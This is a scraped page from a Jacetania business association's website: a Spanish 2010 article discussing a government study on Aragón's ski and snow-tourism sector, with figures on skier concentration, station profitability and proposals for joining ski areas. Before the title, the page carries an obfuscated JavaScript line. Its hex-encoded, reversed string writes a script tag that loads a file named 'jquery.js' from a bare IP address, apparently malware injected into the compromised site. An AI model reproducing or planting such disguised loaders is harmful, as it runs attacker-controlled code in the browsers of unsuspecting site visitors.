var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0])) Estudio de Presidencia de la DGA sobre el sector nieve de Aragón | AEJ
 974 360 019
 aejacetania@ceos.es

Estudio de Presidencia de la DGA sobre el sector nieve de Aragón

  AEJ   30 Sep, 2010   economía, Nieve, Turismo   0 Comentarios

En Octubre de 2.009 se publicó en internet un estudio encargado por el Gobierno de Aragón a la UTE Folia Consultores & Smarpoint, que se denominó “Estudio sobre el Sector de la Nieve en Aragón”.

Este estudio entendimos que se planteaba como un análisis imparcial de la situación (pues no se consultaba a ninguno de los agentes involucrados y se realizó por una empresa ajena), que terminaba con un análisis del escenario  de futuro y proponiendo una serie de directrices básicas y el análisis de los posibles escenarios futuros.

Queremos pensar que realmente fue útil y no está archivado en un armario almacenando polvo. Por lo tanto, aprovechando esta edición especial de BURNAO, queríamos rescatar este estudio para analizar algunas cuestiones que nos parecieron muy interesantes, así como matizar otras que entendemos no deben ser mal interpretadas.

Se hace un profundo análisis de la oferta de los países líderes en Europa, entre los que se encuentran Austria, Suiza, Italia, Francia y Alemania. De todo este análisis, nosotros queremos destacar una conclusión que nos parece fundamental: el esfuerzo conjunto de las empresas situadas en zonas de montaña (estaciones de esquí, hoteles, oferta complementaria) ha sido clave para poder ofrecer al cliente destinos turísticos atractivos tanto en invierno como en verano permitiendo la desestacionalización de la actividad.

En su análisis de la oferta actual de las estaciones de esquí aragonesas concluye que responde a un modelo en vías de agotamiento basado en la afluencia masiva de esquiadores en fin de semana. El 80% de los esquiadores se ha concentrado en el 50% de los días de la temporada, el Puente de la Constitución y las vacaciones navideñas suponen el 20% del total, los fines de semana suponen el 40-45% (lo que evidencia la baja afluencia entre semana). Existen importantes márgenes para aumentar el número de clientes sin saturar la estación.

La clave de futuro está en reducir estas puntas a favor de un modelo de semana, mucho más eficaz y eficiente, y de mayor rentabilidad para el conjunto. Las claves para ello son unos dominios competitivos, y una oferta de alojamiento (hoteles y apartamentos) suficiente tanto en capacidad como en calidad, con accesos fáciles e inmediatos a las pistas.

Análisis de viabilidad del negocio principal. Se analizan los datos económicos de las temporadas 2.006-07 y 2.007-08. Como el primer año fue catastrófico en cuanto a precipitaciones de nieve, todas las estaciones estuvieron muy lejos del umbral de la rentabilidad.

Durante la temporada (2.007/08) únicamente en las estaciones de Teruel se alcanzó el umbral de esquiadores necesarios para hacer rentable las instalaciones (13% de superavit de esquiadores). Panticosa, sin embargo, se quedó lejos de la cifra necesaria de esquiadores para ser rentable (déficit del 71,5% de esquiadores). En un término medio quedan el resto de estaciones, con un déficit de esquiadores que van desde el 12,74% de Formigal, hasta el 26,05% de Cerler, pasando por el 19,94% de Astún.

Como conclusión fundamental, este estudio aconseja continuar ampliando Formigal para alcanzar el número de esquiadores necesarios para llegar al umbral de rentabilidad.

Cuota de mercado nacional: el desarrollo de pequeñas estaciones de proximidad resta visitantes de zonas alejadas al pirineo Aragonés, al no haber una diferenciación tan significativa como para merecer la pena el viaje (Aragón pasa del 33,1% la temporada 2.000/01, al 29% la temporada 2.008/9).

Una de las amenazas que se comentan en el estudio y que actualmente se han vuelto a poner de manifiesto, es la posible pérdida de cuota de mercado  con los importantísimos emisores valenciano y madrileño por las mejoras de comunicaciones a favor de Sierra Nevada, donde se está mejorando el trazado que une Madrid con el sur de España. Evidentemente, a esta situación se une la amenaza de paralización / retraso programado de las obras de acceso a las estaciones del pirineo aragonés también empeora la accesibilidad en comparación con las estaciones andorranas, para esquiadores procedentes tanto de Madrid, como de la Comunidad Valenciana.

Otra de las amenazas detectadas por este estudio es la amplia dispersión de entidades públicas y privadas implicadas en la gestión y promoción del sector de la nieve de Aragón, que dificulta la coordinación y alineación de actividades en pro de un desarrollo armónico del conjunto del territorio

También se hace un novedoso estudio sobre el cambio climático: Tras un exhaustivo estudio, basado en Investigadores del Centro de Estudios de la Nieve del reputado Méteo-France (DUBOIS & CERON, 2006), considerando la hipótesis más desfavorable (con un aumento exponencial de las temperaturas) concluye con que estaciones por debajo de los 1.500 metros se pueden considerar inviables. En cualquier caso, las estaciones aragonesas están por encima de esa cota.

SOLUCIONES PROPUESTAS:

OFERTA DE ESTACIONES

Para afrontar la desestacionalización y los retos que se analizan anteriormente, se plantea la siguiente estrategia:

  • Grandes estaciones: Las tendencias del sector marcan claramente los efectos positivos de fomentar estos modelos (grandes dominios esquiables, amplios y diversos servicios, instalaciones modernas, etc.). Como posibilidades de futuro se proponen las posibles uniones de Formigal Astún y Candanchú, así como la ampliación de Cerler.
  • Estaciones especializadas, para aquellas sin posibilidades de convertirse en grandes dominios.

Nuestro criterio como asociación empresarial es que la unión de Formigal Astún y Candanchú, creando un gran dominio esquiable, es la mejor solución para este valle. Por ello hemos desarrollado desde la Asociación Turística (en la que también se encuentran los Ayuntamientos de este valle) un Plan Maestro, que se analiza en otro artículo de esta edición especial de BURNAO.

SERVICIOS COMPLEMENTARIOS

En el estudio se presenta una conclusión errónea bajo nuestro punto de vista, al considerar que la estructura de empresas hoteleras, mayoritariamente empresas pequeñas y familiares, supone una debilidad de la oferta complementaria por falta de flexibilidad.

Bajo nuestro criterio, no solo no es una debilidad, sino que es una fortaleza y en muchos casos se convierte en una importante ventaja competitiva, puesto que al estar la gestión en los propios núcleos se puede presentar una oferta mucho más variada, con personalidad propia que permita diferenciarse de la competencia estandarizada de otros destinos copadas por las grandes cadenas, la capacidad de reacción es mucho más rápida y desde luego la flexibilidad también es mucho mayor que la de una empresa hotelera con matriz alejada de este destino (en Madrid, o Barcelona, por ejemplo), estructuras organizativas en la que otros intereses pueden jugar en contra de este destino, priorizando otro tipo de destinos en la hipótesis de un escenario de bajo rendimiento económico de estos inmuebles hoteleros, frente a otros destinos.

Finalmente, debería de tenerse en cuenta los ejemplos de los países líderes en turismo de montaña (como Austria, o Suiza), donde el tejido empresarial es también de pequeñas y medianas empresas, lo que no les impide ser competitivos. Bajo nuestro punto de vista no es un problema del modelo, sino más bien de la coordinación de ese esfuerzo conjunto, tal y como menciona el propio estudio con anterioridad.

ESTRUCTURA SECTORIAL

Se plantea como el punto más importante la necesidad imperiosa de coordinar esfuerzos promocionales entre las estaciones de esquí y el resto de actividades turísticas. En este punto estamos totalmente de acuerdo, como hemos demostrado con nuestra participación en diferentes estructuras público – privadas.

Se propone aprovechar las marcas de las estaciones de esquí como núcleo de la promoción de la oferta integral del valle, por encima de otras estructuras (valles especialmente). En nuestro caso particular no estamos completamente de acuerdo.

Sería interesante revisar las marcas que se utilizan, valorando la idoneidad de ellas, el uso que hay que hacer en cada mercado, reforzar unas con otras, como hacer valer su posicionamiento, etc. No hay nada más potente que la marca de una estación de esquí en temporada de invierno, pero en verano no podemos despreciar otras marcas que tenemos en este valle, como por ejemplo Jaca.

Si nos encontramos en varios valles con que la actividad turística fuera de la temporada invernal tiene otros focos de atención que dan una mayor riqueza a la oferta turística, sería poco inteligente despreciarlos para centrarse únicamente en las estaciones de esquí, por lo que consideramos que lo razonable sería hablar de la coordinación de esfuerzos, con la aportación de todos estos agentes a todos los niveles (diseño, ejecución y supervisión del plan de marketing).

Coordinar la promoción y el marketing de amplias zonas es necesario actualmente, así como la implicación ya no solo de las empresas (con su oferta hotelera, gastronómica, comercial y de servicios), sino también de los entes públicos y administraciones implicadas (Ayuntamientos, Comarcas, Diputaciones Provinciales, etc.), que actualmente se incorporan de manera muy irregular.

Al fin y al cabo, gran parte de la oferta turística está en sus manos, tanto el territorio del entorno natural (con todas sus pistas forestales, sendas, refugios, etc.), los monumentos e infraestructuras culturales, así como otro tipo de infraestructuras y servicios como son las oficinas turísticas, instalaciones deportivas, centros de congresos, organización de eventos, etc.

Evidentemente, este diseño a medida de una estrategia coordinada tiene como objetivo que a un destino turístico se le reconozca por una personalidad propia que le otorgue una diferenciación en la oferta turística, dándole una ventaja competitiva relevante y garantizando el futuro. La dispersión de multitud de iniciativas muy loables por separado, pero no coordinadas, seguramente tendrá mucha menos efectividad.

Una vez más, los ejemplos de países como Austria o Suiza nos podrían ayudar a encontrar este tipo de modelo de desarrollo.

Dejar Comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

*

Empresarios Jacetania 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies. ACEPTAR

Aviso de cookies